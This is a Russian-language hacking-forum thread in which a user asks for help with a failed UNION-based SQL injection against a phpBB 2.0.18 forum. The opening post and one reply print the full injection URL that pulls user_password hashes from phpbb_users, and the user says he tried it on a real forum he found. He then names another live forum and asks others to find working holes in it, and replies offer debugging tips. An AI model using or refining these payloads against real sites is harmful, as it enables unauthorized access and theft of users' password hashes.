Вопрос насчет sql injection.

Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)

 

А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...

 

ну извини я сначало видео посмотрел а потом поробовал.

 

Народ в чем же ошибка?

 

может профиксили? попробуй просто -99+or+1=1 че будет

 

У меня так всё работает...

Code:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*

ЗЫ чё-то как-то пробелы сами добавляются....

 

он меня так же выкидывает на index.php.Ничего не происходит.

ты имеешь ввиду у тя таким образом все получается?

 

Судя по ответу работает-соответственно получается

 

Мемберы античата не все разбираються в sql.

 

успокойся,если не хочешь чтоб я был в мемберах так и скажи =)

Насчет вопроса - получается что профиксили?

 

пофиксили

 

тогда вот форум который мне интересен
http://www.wow.wnet.ua/new_forum/
посомтрите если не трудно,я почти все о нем узнал,но ни какие уязвимости не проходят,помогите.
Пожалуйста.

 

Да я против тебя не чегон е имею просто ыт так гвооришь как будто дибил какой то. Вот и отвечаю что не все мемберы знают что воще это такое.

 

за словами следи.
Если помогать не собираешься,зачем флудить?

 

2 Lord Nikon - если ты используешь именно тот запрос, который запостил здесь то служебное слово FROM записано неверно - убери в нем пробел.

 

Lord Nikon, префикс совсем не обязательно phpbb_. Хотя этот префикс в пхпбб по умолчанию. Ещё например phpbb2_ часто бывает. Хотя толковый админ ни тот не другой не поставит. Кто хорошо разбирается в пхпбб, следит за безопасностью, прекрасно знает об sql inj. Только мягко говоря неопытные админы оставят этот префикс. По крайней мере все сайты поддержки пхпбб и наши и забугорные давным давно всем втолковывают - меняйте префиксы. Тем более что делается это элементарно одним запросом. Это так сказать основа безопасности. Удивляюсь, что у кого-то старые префиксы остаются. Совсем лохи наверно. У них наверно и других уязвимостей полно.